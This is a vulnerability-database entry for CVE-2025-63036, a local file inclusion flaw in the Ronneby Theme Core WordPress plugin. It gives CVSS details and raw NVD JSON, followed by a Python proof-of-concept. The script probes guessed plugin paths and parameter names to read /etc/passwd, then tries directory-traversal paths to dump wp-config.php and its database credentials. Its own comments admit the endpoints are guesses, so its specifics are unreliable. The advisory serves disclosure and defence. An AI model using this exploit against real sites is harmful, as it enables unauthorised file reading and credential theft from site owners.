Security Vulnerability Report
中文
CVE-2025-63036 CVSS 7.5 HIGH

CVE-2025-63036

Published: 2025-12-09 16:18:09
Last Modified: 2026-04-27 19:16:19

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DFDevelopment Ronneby Theme Core ronneby-core allows PHP Local File Inclusion.This issue affects Ronneby Theme Core: from n/a through <= 1.5.68.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ronneby-core <= 1.5.68

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63036 PoC - Ronneby Theme Core LFI # Target: WordPress site with vulnerable Ronneby Theme Core plugin (<=1.5.68) import requests import sys target = input("Enter target URL (e.g., http://example.com): ").rstrip('/') # Vulnerable parameter example (actual parameter may vary) vulnerable_paths = [ '/wp-content/themes/ronneby-core/includes/demoimporter/democontent.php', '/wp-content/plugins/ronneby-core/inc/demo-import.php' ] def test_lfi(target, path): """Test for Local File Inclusion vulnerability""" # Read /etc/passwd payload_file = '/etc/passwd' params = { 'file': payload_file # Common parameter name, adjust based on actual endpoint } # Try different parameter names param_names = ['file', 'page', 'template', 'include', 'path', 'load'] for param in param_names: params = {param: payload_file} try: response = requests.get(f'{target}{path}', params=params, timeout=10) # Check if /etc/passwd content is leaked if 'root:' in response.text or 'daemon:' in response.text: print(f'[+] VULNERABLE! Parameter: {param}') print(f'[+] Leaked /etc/passwd content:') print(response.text[:500]) return True except requests.RequestException as e: print(f'[-] Error testing {param}: {e}') return False def read_wp_config(target): """Attempt to read wp-config.php via LFI""" paths_to_try = [ '../../../../wp-config.php', '/wp-config.php', '../wp-config.php', '....//....//wp-config.php' ] for path in paths_to_try: params = {'file': path} try: response = requests.get(target, params=params, timeout=10) if 'DB_NAME' in response.text and 'DB_USER' in response.text: print(f'[+] Successfully read wp-config.php with path: {path}') print(response.text) return True except: continue return False print('[+] Testing CVE-2025-63036 - Ronneby Theme Core LFI') print('[+] Target:', target) for path in vulnerable_paths: print(f'\n[*] Testing path: {path}') if test_lfi(target, path): print('[+] Vulnerability confirmed!') print('\n[*] Attempting to read wp-config.php...') read_wp_config(f'{target}{path}') break

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63036", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:09.207", "lastModified": "2026-04-27T19:16:19.157", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DFDevelopment Ronneby Theme Core ronneby-core allows PHP Local File Inclusion.This issue affects Ronneby Theme Core: from n/a through <= 1.5.68."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ronneby-core/vulnerability/wordpress-ronneby-theme-core-plugin-1-5-68-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}